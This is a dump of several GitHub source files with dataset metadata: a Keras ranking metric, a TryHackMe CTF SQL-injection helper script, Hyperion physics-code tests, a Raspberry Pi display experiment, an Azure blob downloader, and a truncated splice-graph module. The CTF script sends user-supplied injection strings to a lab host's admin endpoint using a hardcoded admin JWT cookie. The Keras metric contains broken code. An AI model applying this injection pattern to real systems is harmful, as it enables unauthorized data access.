seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
20049471962 | import numpy as np
from keras.applications.vgg16 import preprocess_input
def predict(img_dir):
img = load_img(img_dir)
img = np.resize(img, (224,224,3))
img = preprocess_input(img_to_array(img))
img = (img/255.0)
img = np.expand_dims(img, axis=0)
prediction = model.predict(img)
idx = np.argmax(prediction)
return idx
pred = test_label_df.at[idx,'keras_index']
def second_metric(test_df):
x = 0
P = 0
users = test_df['user'].value_counts()
for index, row in users.items():
N = 0
su_df = test[test['user']==index]
labels_idx = su_df['label'].value_counts()
for index2, row2 in labels_idx.items():
r = 0
s_obs = su_df[su_df['label']==index2]
for index3, row3 in s_obs.iterrows():
img_dir = row3['id']
pred = test_label_df.at[idx,'keras_index']
if pred==row3['label']:
r += 1/row3['rank']
temp_N = row3['label']
if r == 0:continue
N += r/len(s_obs.index)
P += (N/su_df['label'].nunique())
print(str(P)+ ' P')
print(su_df['label'].nunique())
U = test['user'].nunique()
return P/U
def first_metric(test_df):
P = 0
users = test_df['user'].value_counts()
for index, row in users.items():
r = 0
temp = test_df[test['user']==index]
for index2, row2 in temp.iterrows():
img_dir = row2['id']
img = load_img(img_dir)
img = np.resize(img, (224,224,3))
img = preprocess_input(img_to_array(img))
img = (img/255.0)
img = np.expand_dims(img, axis=0)
prediction = model.predict(img)
idx = np.argmax(prediction)
pred = test_label_df.at[idx,'keras_index']
print(pred==row2['label'])
if pred==row2['label']:
r += 1/row2['rank']
if r == 0:continue
sum_r = 1/r
temp_P = (sum_r/temp['label'].nunique())
P += temp_P
U = test_df['user'].nunique()
return P/U
| ocinemod87/Advanced_Topics_Image_Analysis | Assignment_3/custom_metric.py | custom_metric.py | py | 1,949 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.resize",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "keras.applications.vgg16.preprocess_input",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.expand_dims",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": ... |
5991316924 | import requests
import re
import sys
inject = sys.argv[1]
url = f"http://10.10.33.143/admin?user={inject}"
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2ODE0MDYxNjZ9.7S5bGRpPZetpWvlwYOa3U2D24wYQGDcm7R_CaLONA5E"
headers = {
"Cookie": f"token={token}"
}
r = requests.get(url, headers=headers)
result = re.findall(r'<body>(.*)</body>', r.text, re.S)
print(result[0])
# print(r.text)
| singha-brother/ctf_challenges | TryHackMe/marketplace/sql_exploit.py | sql_exploit.py | py | 461 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "re.S",
"line_number": 16,
... |
37412475145 | import pytest
import numpy as np
from ...dust import IsotropicDust
from ...util.functions import B_nu
from .. import Model
from .test_helpers import random_id, get_test_dust
def test_point_source_outside_grid(tmpdir):
dust = get_test_dust()
m = Model()
m.set_cartesian_grid([-1., 1.], [-1., 1.], [-1., 1.])
m.add_density_grid(np.array([[[1.]]]), dust)
m.set_n_photons(initial=100, imaging=0)
s = m.add_point_source()
s.position = (-1.5, 0., 0.)
s.temperature = 5000.
s.luminosity = 1.
m.write(tmpdir.join(random_id()).strpath)
log_file = tmpdir.join(random_id()).strpath
with pytest.raises(SystemExit) as exc:
m.run(tmpdir.join(random_id()).strpath, logfile=log_file)
assert exc.value.args[0] == 'An error occurred, and the run did not ' + \
'complete'
assert 'photon was not emitted inside a cell' in open(log_file).read()
def test_unsorted_spectrum(tmpdir):
m = Model()
m.set_cartesian_grid([-1., 1.], [-1., 1.], [-1., 1.])
m.set_n_photons(initial=100, imaging=0)
s = m.add_point_source()
s._spectrum = {'nu': [3.e20, 2.e10, 1], 'fnu': [1, 2, 3]}
s.luminosity = 1.
m.write(tmpdir.join(random_id()).strpath)
log_file = tmpdir.join(random_id()).strpath
with pytest.raises(SystemExit) as exc:
m.run(tmpdir.join(random_id()).strpath, logfile=log_file)
assert exc.value.args[0] == 'An error occurred, and the run did not ' + \
'complete'
assert 'spectrum frequency should be monotonically increasing' in open(log_file).read()
def test_spectrum_dust_nooverlap(tmpdir):
# Set up dust with a narrow frequency range
nu = np.logspace(8., 10., 100)
albedo = np.repeat(0.5, 100)
chi = np.ones(100)
d = IsotropicDust(nu, albedo, chi)
d.set_lte_emissivities(10, 0.1, 1000.)
# Set up model with a source with a wider frequency range
m = Model()
s = m.add_point_source()
s.luminosity = 1.
nu = np.logspace(5., 12., 1000)
s.spectrum = (nu, B_nu(nu, 6000.))
m.set_cartesian_grid([-1., 1.], [-1., 1.], [-1., 1])
m.add_density_grid(np.array([[[1.]]]), d)
m.set_n_photons(initial=1000, imaging=0)
m.write(tmpdir.join(random_id()).strpath)
log_file = tmpdir.join(random_id()).strpath
with pytest.raises(SystemExit) as exc:
m.run(tmpdir.join(random_id()).strpath, logfile=log_file)
assert exc.value.args[0] == 'An error occurred, and the run did not ' + \
'complete'
assert 'photon frequency' in open(log_file).read()
assert 'is outside the range defined' in open(log_file).read()
assert 'for the dust optical properties' in open(log_file).read()
| hyperion-rt/hyperion | hyperion/model/tests/test_fortran.py | test_fortran.py | py | 2,753 | python | en | code | 51 | github-code | 36 | [
{
"api_name": "test_helpers.get_test_dust",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "test_helpers.random_id",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "test_he... |
40272165655 | import abc
import threading
import time
from datetime import datetime
from .AbstractProcess import AbstractProcess
from .SaveStopProcess import SaveStopProcess
from utils.threads import set_thread_name
class SaveStartProcess(AbstractProcess):
@staticmethod
def __parse_buffer(buffer):
try:
coordinates, collect_time = buffer.split('/')
coordinates = tuple(int(i) for i in coordinates.split(','))
collect_time = int(collect_time)
return coordinates, collect_time
except ValueError:
coordinates = tuple(int(i) for i in buffer.split(','))
return coordinates, None
@staticmethod
def __msg_to_send(coordinates):
msg = ""
try:
from_x, from_y, to_x, to_y = coordinates
msg += "'from' coordinate: (%d, %d)\n" % (from_x, from_y)
msg += "'to' coordinate: (%d, %d)" % (to_x, to_y)
except ValueError:
x, y = coordinates
msg += "Saving start-coordinate: (%d, %d)\n" % (x, y)
finally:
return msg
@abc.abstractmethod
def execute(self):
set_thread_name("SAVE_START")
print('\n>>>save_start_process', threading.current_thread())
self.shutdown_and_wait()
self.is_save = True
buffer = self.request.recv(100).decode().strip()
coordinate, collect_time = self.__parse_buffer(buffer)
self.collection_details.coordinate = coordinate
self.collection_details.save_start_time = datetime.now()
threading.Thread(target=self.reopen_server,
args=('save_start_process',), daemon=True).start()
msg = self.__msg_to_send(coordinate)
self.send_msg_to_client(msg)
if collect_time:
set_thread_name("REOPEN")
time.sleep(collect_time)
SaveStopProcess(self.server, self.request).execute()
| donghyyun/PF_OfflinePhaseServer | handle_processes/SaveStartProcess.py | SaveStartProcess.py | py | 1,933 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "AbstractProcess.AbstractProcess",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "utils.threads.set_thread_name",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "threading.current_thread",
"line_number": 40,
"usage_type": "call"
},
{... |
36939059453 | import plotly.express as px
import plotly.graph_objects as go
import pandas as pd
def create_number_tweets_graphic(
data: pd.DataFrame, colors: list[str], time_stamps: list[tuple[int, int]]
) -> go.Figure:
"""Returns a picture with a histogram per newspaper
Args:
data (pd.DataFrame): Data frame with a "created_at" column
colors (list[str]): List of colors for the graph
time_stamps (list[tuple[int, int]]): List with the timestamps
Returns:
go.Figure: Histogram figure
"""
fig = px.histogram(
data,
x="created_at",
color_discrete_sequence=colors,
facet_row="newspaper",
title=f"<b>Number of tweets per newspaper</b><br>From W{time_stamps[0][1]} of {time_stamps[0][0]} to W{time_stamps[-1][1]} of {time_stamps[-1][0]}",
height=1600,
)
fig.update_traces(xbins_size="D1")
fig.update_layout(title={"x": 0.02, "y": 0.97})
fig.for_each_annotation(lambda a: a.update(text=f"@{a.text.split('=')[-1]}"))
return fig
| drearondov/nlp-newspapersDashboard | nlp_newspapersDashboard/api/number_tweets.py | number_tweets.py | py | 1,038 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "plotly.express.histogram",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "plotly.g... |
22636872735 | import os
os.system('sudo pigpiod')
import time
from random import randint
from random import shuffle
import pigpio
import RPi.GPIO as GPIO
from datetime import datetime
import numpy as np
import pandas as pd
import pygame
###variables for filenames and save locations###
partnum = '001'
device = 'Amp'
filename = 'Shutter_Image'
exp_loc = 'Shutter_Image'
date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
###setup GPIO pins and initialise pygame###
pi = pigpio.pi()
GPIO.setmode(GPIO.BCM)
pygame.init()
pygame.display.init()
###setup pins for triggers###
GPIO.setup([4,17,27,22,5,6,13,19],GPIO.OUT)
###setup pins for each LCD###
lcd_freq = 17
dc = 50 * 10000
###setup pin for push button###
pin = 26
GPIO.setup(pin,GPIO.IN,pull_up_down=GPIO.PUD_UP)
###setup variables to record times###
trial_dc = []
trial_face = []
resp_time = []
resp_type = []
face_num = []
###audio file location###
tone = '/home/pi/Pi_Experiments/Stimuli/Sounds/Auditory_Oddball/low_tone.wav'
###setup the display screen and fixation###
pygame.mouse.set_visible(0)
disp_info = pygame.display.Info()
x_width = disp_info.current_w
y_height = disp_info.current_h
x_center = disp_info.current_w/2
y_center = disp_info.current_h/2
screen = pygame.display.set_mode((x_width, y_height),pygame.FULLSCREEN)
####FOR TESTING ONLY####
##x_width = 400
##y_height = 300
##x_center = x_width/2
##y_center = y_height/2
##screen = pygame.display.set_mode((x_width, y_height),pygame.RESIZABLE)
########################
black = pygame.Color(0, 0, 0)
white = pygame.Color(255,255,255)
grey = pygame.Color(127,127,127)
rect_x = 5
rect_y = 5
screen.fill(white)
###settings to change###
font_colour = black
fixation_colour_outer= black
fixation_length_outer = 4
fixation_size_outer = 3
fixation_colour_inner = white
fixation_length_inner = 3
fixation_size_inner = 1
###create our grid###
grid_size = 9 ###total squares will be this number squared, max is 9 due to current trigger system (i_square * 3 = onset; i_square * 3 + 1 = offset)
fig_style = 3 ###1 = horizontal; 2 = vertical; 3 = repeat gradient
colour_order = [255,0] ###1 = black to white; 2 = white to black
fixation_time = 0 ###number of seconds to focus on each square
pre_time = 0.5
post_time = 0.5
#########################
###determine x and y coordinates for each square###
x_locs = list(np.linspace(0,x_width,(grid_size)+1))
y_locs = list(np.linspace(0,y_height,(grid_size)+1))
###setup our colours (black, greys, white)
grid_colour = []
colour_list = np.linspace(colour_order[0],colour_order[1],(grid_size))
for i_square in range((grid_size)):
temp = np.zeros(3) + colour_list[i_square]
grid_colour.append(temp.tolist())
###draw grid###
for i_y in range(len(y_locs)-1):
if fig_style == 1: ###horizontal bars
for i_x in range(len(x_locs)-1):
pygame.draw.rect(screen, grid_colour[i_y], (x_locs[i_x], y_locs[i_y], x_locs[i_x+1], y_locs[i_y+1]),0)
elif fig_style == 2: ###vertical bars
for i_x in range(len(x_locs)-1):
pygame.draw.rect(screen, grid_colour[i_x], (x_locs[i_x], y_locs[i_y], x_locs[i_x+1], y_locs[i_y+1]),0)
elif fig_style == 3: ###repeat gradient
for i_x in range(len(x_locs)-1):
pygame.draw.rect(screen, grid_colour[i_x], (x_locs[i_x], y_locs[i_y], x_locs[i_x+1], y_locs[i_y+1]),0)
grid_colour.append(grid_colour.pop(0))
###Setup our function to send triggers###
def pi2trig(trig_num):
pi_pins = [4,17,27,22,5,6,13,19]
bin_num = list(reversed(bin(trig_num)[2:]))
while len(bin_num) < len(pi_pins):
bin_num.insert(len(bin_num)+1,str(0))
trig_pins = []
trig_pos = 0
for i_trig in range(len(pi_pins)):
if bin_num[i_trig] == '1':
trig_pins.insert(trig_pos,pi_pins[i_trig])
trig_pos = trig_pos + 1
return trig_pins
###set triggers to 0###
GPIO.output(pi2trig(255),0)
###wait for response###
pygame.display.flip()
time.sleep(0.1)
key_pressed = 0
pygame.event.clear()
while key_pressed == 0:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
key_pressed = 1
time.sleep(0.5)
pi.hardware_PWM(18, lcd_freq, dc)
###draw a fixation over the square to focus on###
if fig_style == 1:###horizontal lines
###collapse across x locations###
x_locs = [0,x_locs[-1]]
elif fig_style == 2: ###vertical lines
###collapse across y locations###
y_locs = [0,y_locs[-1]]
i_square = 0
for i_y in range(len(y_locs)-1):
for i_x in range(len(x_locs)-1):
###update current square###
i_square += 1
###determine center of current square###
x_center = int(x_locs[i_x] + ((x_locs[i_x+1] - x_locs[i_x])/2))
y_center = int(y_locs[i_y] + ((y_locs[i_y+1] - y_locs[i_y])/2))
###get colour of current square###
crnt_colour = screen.get_at((x_center, y_center))[:3]
###draw fixation###
pygame.draw.line(screen, fixation_colour_outer, (x_center-fixation_length_outer, y_center), (x_center+fixation_length_outer, y_center),fixation_size_outer)
pygame.draw.line(screen, fixation_colour_outer, (x_center, y_center-fixation_length_outer), (x_center, y_center+fixation_length_outer),fixation_size_outer)
pygame.draw.line(screen, fixation_colour_inner, (x_center-fixation_length_inner, y_center), (x_center+fixation_length_inner, y_center),fixation_size_inner)
pygame.draw.line(screen, fixation_colour_inner, (x_center, y_center-fixation_length_inner), (x_center, y_center+fixation_length_inner),fixation_size_inner)
GPIO.output(pi2trig(((i_square)*3)),1)
pygame.display.flip()
###wait for a bit###
time.sleep(pre_time)
GPIO.output(pi2trig(255),0)
time.sleep(fixation_time)
GPIO.output(pi2trig(((i_square)*3)+1),1)
time.sleep(post_time)
GPIO.output(pi2trig(255),0)
###remove fixation###
pygame.draw.line(screen, crnt_colour, (x_center-fixation_length_outer, y_center), (x_center+fixation_length_outer, y_center),fixation_size_outer)
pygame.draw.line(screen, crnt_colour, (x_center, y_center-fixation_length_outer), (x_center, y_center+fixation_length_outer),fixation_size_outer)
pi.hardware_PWM(18, lcd_freq, 0)
os.system('sudo killall pigpiod')
pygame.display.quit()
pygame.quit()
GPIO.cleanup()
| APPLabUofA/Pi_Experiments | Shutter_Grid/Task/shutter_grid.py | shutter_grid.py | py | 6,498 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "os.system",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "pigpio.pi",
"lin... |
1435191130 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import shutil
import azure
from azure.storage import BlobService
import azure.http
import os.path
import sys
import os
import pdb
storage_name = ""
storage_key = ""
def list_files_from_path(container, path):
blob_service = BlobService(account_name=storage_name, account_key=storage_key)
next_marker = None
results = []
while True:
blobs = blob_service.list_blobs(container, prefix=path, maxresults=2000, marker=next_marker)
for blob in blobs:
results.append(blob.name)
next_marker = blobs.next_marker
if not next_marker:
break
return results
def download_file(container, path, dest):
blob_service = BlobService(account_name=storage_name, account_key=storage_key)
loop = 0
while True:
try:
blob_service.get_blob_to_path(container, path, dest)
break
except azure.http.HTTPError as e:
loop = loop + 1
if loop >= 3:
return
if __name__ == '__main__':
storage_name = input(">>storage_name:")
storage_key = input(">>storage_key:")
container = input(">>container:")
path = input(">>path")
#container="azurefilesystem2"
#path="Ver0v1/2015-03-26"
print(storage_name)
print(storage_key)
print(container)
print(path)
if not os.path.exists(container):
os.makedirs(container)
files = list_files_from_path(container, path)
print("total files count is {0}".format(len(files)))
for f in files:
f_name = os.path.basename(f)
dest = os.path.join(container, f_name)
print("download from {0}:{1} to {2}".format(container, f, dest))
download_file(container, f, dest)
| UnluckyNinja/hwindCode | python/scripts/download_files_from_azure.py | download_files_from_azure.py | py | 1,763 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "azure.storage.BlobService",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "azure.storage.BlobService",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "azure.http",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "o... |
22112532649 | import networkx as nx
import itertools as it
import argparse
import algorithms as algs
import gtf
from utils import get_chr, get_start_pos, get_end_pos, get_pos, merge_list_of_dicts
import utils
import sys
from wig import Wig
from exon_seek import ExonSeek
import multinomial_em as mem
import copy
# logging imports
import logging
class SpliceGraph(object):
'''
The SpliceGraph class is meant to provide a common repository for creation
of splice graphs for a single gene.
'''
def __init__(self, annotation, chr, strand, read_threshold=5, filter_factor=50, min_count=1):
self.chr = chr
self.strand = strand
self.READ_THRESHOLD = read_threshold
self.MIN_COUNT = min_count
self.FILTER_FACTOR = filter_factor
self.annotation = [] # set value using set_graph_as_annotation
if annotation is not None:
self.set_graph_as_annotation(annotation)
else:
self.graph = None
def get_graph(self):
"""getter for self.graph"""
return self.graph
def set_graph_as_annotation(self, annotation):
"""
Create a nx DiGraph from list of tx in gene. FILTER_FACTOR defines a
cutoff for using a tx of a gene. A tx must have x num of exon where x
> MAX tx exon num / FILTER_FACTOR.
"""
# filter low exon tx
max_exons = max(map(len, annotation)) # figure out max num exons
self.annotation = map(lambda y: sorted(y, key=lambda z: (z[0], z[1])), # make sure exons are sorted by position
filter(lambda x: len(x) > max_exons / self.FILTER_FACTOR, annotation)) # filter based on max num exons criteria
# create graph
graph = nx.DiGraph()
for tx in self.annotation:
graph.add_path(tx)
self.graph = graph # set graph attribute
def set_annotation_edge_weights(self, weights):
"""
Only try to find weights for already existing edges in the graph. This
function is intended to add weight values to edges defined in the gtf
annotation.
"""
# add edge weights to edges from annotation
for u, v in self.graph.edges():
try:
#tmpChr = get_chr(exon_forms[u])
start = u[1] # get_start_pos(exon_forms[u])
end = v[0] # get_end_pos(exon_forms[v])
#tmpWeight = weights[self.chr][start][end]
tmpWeight = weights[(self.chr, start, end)]
self.graph[u][v]['weight'] = tmpWeight
except KeyError:
self.graph[u][v]['weight'] = 1 # set dummy value
self.graph[u][v]['weight'] = max(self.graph[u][v]['weight'], self.MIN_COUNT) # set read count to at least a user-defined value
def set_graph_as_nodes_only(self, exons):
"""
Simple function that makes a DAG (nx.DiGraph) with only nodes and no
edges. Meant to be used to before add_all_possible_edge_weights.
"""
G = nx.DiGraph()
G.add_nodes_from(exons)
self.graph = G
def add_all_possible_edge_weights(self, weights): # use to have exon_forms rather than chr
"""
Add edge/weights to graph if supported by atleast READ_THRESHOLD
number of reads
"""
# add novel edges if well supported
sorted_nodes = sorted(self.graph.nodes())
for i in range(len(sorted_nodes) - 1):
for j in range(i + 1, len(sorted_nodes)):
try:
start = sorted_nodes[i][1] # get_start_pos(exon_forms[sorted_nodes[i]])
end = sorted_nodes[j][0] # get_end_pos(exon_forms[sorted_nodes[j]])
if weights[(self.chr, start, end)] >= self.READ_THRESHOLD:
self.graph.add_edge(sorted_nodes[i], sorted_nodes[j])
self.graph[sorted_nodes[i]][sorted_nodes[
j]]['weight'] = weights[(self.chr, start, end)]
except KeyError:
pass
def get_from_gtf_using_gene_name(gtf, strand, chr, start, end):
'''
This function finds the first gene in the gtf that completely contains the
target interval. I should really think about checking for multiple genes
instead of just returning the first one found.
'''
for gene_key in gtf[chr]:
if gtf[chr][gene_key]['strand'] == strand and gtf[chr][gene_key]['start'] <= start and gtf[chr][gene_key]['end'] >= end:
for ex in gtf[chr][gene_key]['exons']:
# if start >= ex[0] and end <= ex[1]:
if start == ex[0] and end == ex[1]:
gtf[chr][gene_key]['target'] = ex # this line needed for compatability reasons
return gtf[chr][gene_key], gene_key
raise utils.PrimerSeqError("Error: Did not find an appropriate gtf annotation")
def get_weakly_connected_tx(gtf, strand, chr, start, end, plus_or_minus=1000000):
'''
This function is meant to handle tx annotations without gene ids.
Currently this is a function outside of the SpliceGraph class but it may
be beneficial to later include this as a method.
'''
# compile all tx paths that are reasonably close
tmp_tx = []
for gene_key in gtf[chr]:
if gtf[chr][gene_key]['strand'] == strand and gtf[chr][gene_key]['start'] <= (start + plus_or_minus) and gtf[chr][gene_key]['end'] >= (end - plus_or_minus):
tmp_tx += gtf[chr][gene_key]['graph']
# get the weakly connected subgraph that contains the target exon
sg = SpliceGraph(tmp_tx, chr, strand, filter_factor=1000)
G = sg.get_graph()
weakly_con_subgraphs = nx.weakly_connected_component_subgraphs(G)
if not (len(weakly_con_subgraphs) > 0): raise utils.PrimerSeqError('Error: No annotations were even near your target')
target_graph = None
for weak_subgraph in weakly_con_subgraphs:
for node_start, node_end in weak_subgraph.nodes():
# if node_start <= start and node_end >= end:
if node_start == start and node_end == end:
target_graph = weak_subgraph
start, end = node_start, node_end
if target_graph is None: raise utils.PrimerSeqError('Error: Target was not contained in a tx')
# filter tmp_tx to tx that contain atleast one node in subgraph
filtered_tmp_tx = []
for tx in tmp_tx:
for exon in tx:
if exon in target_graph.nodes():
filtered_tmp_tx.append(tx)
break
if not (len(filtered_tmp_tx) > 0): utils.PrimerSeqError('Error: Your target was not contained in a tx.')
### convert info to dict ###
g_dict = {}
# get a unique set of all exons
exons = set()
for t in filtered_tmp_tx:
exons |= set(t)
g_dict['exons'] = sorted(exons, key=lambda x: (x[0], x[1]))
g_dict['start'] = g_dict['exons'][0][0]
g_dict['end'] = g_dict['exons'][-1][1]
g_dict['chr'] = chr
g_dict['graph'] = filtered_tmp_tx
g_dict['target'] = (start, end)
return g_dict, 'Invalid'
def get_flanking_biconnected_exons(name, target, sGraph, genome):
'''
Defines flanking exons as exons that cannot be skipped in
the graph structure. Theese exons are 100% included and do not
need estimation of inclusion level.
'''
graph = sGraph.get_graph() # nx.DiGraph
# search through each biconnected component
for component in algs.get_biconnected(graph):
component = sorted(component, key=lambda x: (x[0], x[1])) # ensure first component is first exon, etc
if target in component[1:-1]:
# define upstream/downstream flanking exon
if sGraph.strand == '+':
upstream = component[0]
downstream = component[-1]
else:
upstream = component[-1]
downstream = component[0]
# get possible lengths
all_paths = algs.AllPaths(sGraph, component, target,
chr=sGraph.chr, strand=sGraph.strand)
# all_paths.set_all_path_lengths() # should no longer need this since it is done in primer.py
all_paths.set_all_path_coordinates()
# get sequence of upstream/target/downstream combo
genome_chr = genome[sGraph.chr] # chr object from pygr
upstream_seq, target_seq, downstream_seq = genome_chr[upstream[0]:upstream[1]], genome_chr[target[0]:target[1]], genome_chr[downstream[0]:downstream[1]]
if sGraph.strand == '-':
upstream_seq, target_seq, downstream_seq = \
-upstream_seq, -target_seq, -downstream_seq
return [sGraph.strand, name[1:], 'NA',
sGraph.chr + ':' + '-'.join(map(str, upstream)), '1.0',
sGraph.chr + ':' + '-'.join(map(str, downstream)), '1.0',
all_paths, str(upstream_seq).upper(),
str(target_seq).upper(), str(downstream_seq).upper()]
return ['Error: ' + name + ' was not found in a biconnected component']
def get_sufficient_psi_exons(name, target, sGraph, genome, ID, cutoff, upstream_exon, downstream_exon):
"""
Utilizes the ExonSeek class to find flanking exons that are
good enough to be called "constitutive".
"""
# find appropriate flanking "constitutive" exon for primers
exon_seek_obj = ExonSeek(target, sGraph, ID, cutoff, upstream_exon, downstream_exon)
all_paths, upstream, downstream, component, psi_target, psi_upstream, psi_downstream = exon_seek_obj.get_info()
# lack of successor/predecessor nodes
if upstream is None or downstream is None:
logging.debug("Error: %s does not have an upstream exon, downstream exon, or possibly both" % str(component))
return ["Error: %s does not have an upstream exon, downstream exon, or possibly both" % str(component)]
# get sequence of upstream/target/downstream combo
genome_chr = genome[sGraph.chr] # chr object from pygr
upstream_seq, target_seq, downstream_seq = genome_chr[upstream[0]:upstream[1]], genome_chr[target[0]:target[1]], genome_chr[downstream[0]:downstream[1]] # get sequence using pygr
if sGraph.strand == '-':
upstream_seq, target_seq, downstream_seq = -upstream_seq, -target_seq, -downstream_seq # get reverse-complement if necessary
return [sGraph.strand, name[1:], psi_target,
sGraph.chr + ':' + '-'.join(map(str, upstream)), # upstream eg. +chr1:1000-2000
psi_upstream,
sGraph.chr + ':' + '-'.join(map(str, downstream)), # downstream eg. +chr1:1000-2000
psi_downstream,
all_paths, upstream_seq,
target_seq, downstream_seq]
def predefined_exons_case(id, target, sGraph, genome, upstream_exon, downstream_exon):
"""
Strategy:
1. Use All Paths (then trim)
2. Save counts/paths to file
3. get sequence information
"""
# get possible exons for primer amplification
tmp_exons = copy.deepcopy(sGraph.get_graph().nodes())
tmp = sorted(tmp_exons, key=lambda x: (x[0], x[1]))
if sGraph.strand == '+':
my_exons = tmp[tmp.index(upstream_exon):tmp.index(downstream_exon) + 1]
else:
my_exons = tmp[tmp.index(downstream_exon):tmp.index(upstream_exon) + 1]
# Use correct tx's and estimate counts/psi
all_paths = algs.AllPaths(sGraph, my_exons, target, chr=sGraph.chr, strand=sGraph.strand)
# all_paths.trim_tx_paths()
#all_paths.trim_tx_paths_using_flanking_exons(sGraph.strand, upstream_exon, downstream_exon)
all_paths.trim_tx_paths_using_flanking_exons_and_target(sGraph.strand, target, upstream_exon, downstream_exon)
all_paths.set_all_path_coordinates()
# all_paths.keep_weakly_connected() # hack to prevent extraneous exons causing problems in EM alg
paths, counts = all_paths.estimate_counts() # run EM algorithm
# psi_target = algs.estimate_psi(target, paths, counts)
psi_target = mem.estimate_psi(target, paths, counts)
utils.save_path_info(id, paths, counts) # save paths/counts in tmp/isoforms/id.json
# get sequence of upstream/target/downstream combo
genome_chr = genome[sGraph.chr] # chr object from pygr
upstream_seq, target_seq, downstream_seq = genome_chr[upstream_exon[0]:upstream_exon[1]], genome_chr[target[0]:target[1]], genome_chr[downstream_exon[0]:downstream_exon[1]] # get sequence using pygr
if sGraph.strand == '-':
upstream_seq, target_seq, downstream_seq = -upstream_seq, -target_seq, -downstream_seq # get reverse-complement if necessary
return [sGraph.strand, '%s:%d-%d' % (sGraph.chr, target[0], target[1]), psi_target,
sGraph.chr + ':' + '-'.join(map(str, upstream_exon)), # upstream eg. +chr1:1000-2000
-1, # user defined exon, don't estimate psi
sGraph.chr + ':' + '-'.join(map(str, downstream_exon)), # downstream eg. +chr1:1000-2000
-1, # user defined exon, don't estimate psi
all_paths, upstream_seq,
target_seq, downstream_seq]
def calculate_target_psi(target,
sg_list,
component,
up_exon=None,
down_exon=None):
"""
Calculate psi for the target exon for each bam file. Sometimes there are
no inc and no skip counts so there will be a divide by zero error. In such
cases PSI takes the value of -1.
"""
logging.debug("Calculating psi for each bam file . . .")
psi_list = []
for sg in sg_list:
# setup allpaths object
ap = algs.AllPaths(sg, component, target, chr=sg.chr)
# trim paths according to if user specified flanking exons
if up_exon and down_exon:
ap.trim_tx_paths_using_flanking_exons(sg.strand, up_exon, down_exon)
else:
ap.trim_tx_paths()
# ap.keep_weakly_connected() # hack to avoid problems with user specified flanking exons
# estimate psi
paths, counts = ap.estimate_counts()
tmp_inc_count, tmp_skip_count = 0., 0.
for i, p in enumerate(paths):
if target in p:
tmp_inc_count += counts[i] / (len(p) - 1) # need to normaliz inc counts by number of jcts
else:
tmp_skip_count += counts[i] / (len(p) - 1) # need to normalize skip counts by number of jcts
if not tmp_inc_count and not tmp_skip_count:
tmp_psi = -1 # -1 indicates divide by zero error
else:
tmp_psi = tmp_inc_count / (tmp_inc_count + tmp_skip_count)
psi_list.append(tmp_psi)
logging.debug("Finished calculating psi for each bam file.")
return ';'.join(map(lambda x: '%.4f' % x, psi_list)) # only report to four decimal places
def construct_splice_graph(edge_weights_list, gene_dict, chr, strand, read_threshold, min_count,
output_type='single', both=False):
"""
Handles construction of SpliceGraph objects
"""
if output_type == 'single':
# case where counts are pooled from all BAM files
splice_graph = SpliceGraph(annotation=gene_dict['graph'], # use junctions from annotation
chr=chr,
strand=strand,
read_threshold=read_threshold,
min_count=min_count)
edge_weights = merge_list_of_dicts(edge_weights_list) # merge all SAM/BAM read counts to a single dictionary
splice_graph.set_annotation_edge_weights(edge_weights) # set edge weights supported from annotation
if both: splice_graph.add_all_possible_edge_weights(edge_weights) # also use junctions from RNA-Seq
return splice_graph
elif output_type == 'list':
# returns a list of splice graphs (one for each BAM file)
single_bam_splice_graphs = []
for eweight in edge_weights_list:
tmp_sg = SpliceGraph(annotation=gene_dict['graph'],
chr=chr,
strand=strand,
read_threshold=read_threshold,
min_count=min_count)
tmp_sg.set_annotation_edge_weights(eweight)
if both: tmp_sg.add_all_possible_edge_weights(eweight)
single_bam_splice_graphs.append(tmp_sg)
return single_bam_splice_graphs
def main(options, args_output='tmp/debug.json'):
    """
    The gtf main function is the function designed to be called from other
    scripts. It iterates through each target exons and returns the necessary
    information for primer design.

    Parameters
    ----------
    options : dict
        expected keys (from SOURCE usage): 'fasta' (pygr genome),
        'gtf', 'target' (iterable of (name, line) pairs where line[0]
        is the strand-prefixed coordinate string), 'rnaseq' (list of
        SAM/BAM interface objects), 'no_gene_id', 'both_flag',
        'read_threshold', 'min_jct_count', 'psi'
    args_output : str
        not referenced inside this function; kept for callers that
        pass an output path

    Returns
    -------
    list
        one entry per target: either the primer-design data list, or a
        one-element list holding the PrimerSeqError message for that
        target
    """
    genome, args_gtf, args_target = options['fasta'], options['gtf'], options['target']
